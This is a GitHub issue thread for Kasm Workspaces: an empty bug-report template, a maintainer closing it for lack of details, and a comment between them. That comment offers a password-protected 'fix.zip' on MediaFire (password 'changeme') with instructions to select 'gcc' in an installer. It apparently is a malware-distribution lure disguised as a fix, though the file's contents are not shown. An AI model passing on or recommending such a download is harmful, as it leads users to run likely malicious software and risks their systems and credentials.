### ISSUE TITLE
No resources are available to create the requested Kasm.[Bug] - 

### ISSUE THREAD

**Issue by knight790** [kasmtech/workspaces-issues#612]
### Existing Resources

- [x] Please search the existing issues for related problems
- [x] Consult the product documentation : [Docs](https://kasmweb.com/docs/latest/index.html)
- [x] Consult the FAQ : [FAQ](https://kasmweb.com/docs/latest/FAQ.html)
- [x] Consult the Troubleshooting Guide : [Guide](https://kasmweb.com/docs/latest/guide/troubleshooting.html)
- [x] Reviewed existing training videos: [Youtube](https://www.youtube.com/@KasmWorkspaces )

**Describe the bug**

**To Reproduce**

**Expected behavior**

**Screenshots**

**Workspaces Version**
e.g Version 1.12

**Workspaces Installation Method**
e.g Single Server, Multi-Server, TrueNAS, linuxserver.io, terraform, ansible

**Client Browser (please complete the following information):**

**Workspace Server Information (please provide the output of the following commands):**
 - `uname -a`
 - `cat /etc/os-release`
 - `sudo docker info`
 - `sudo docker ps | grep kasm`

**Additional context**

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by j-travis** [comment]
Closing. No details given
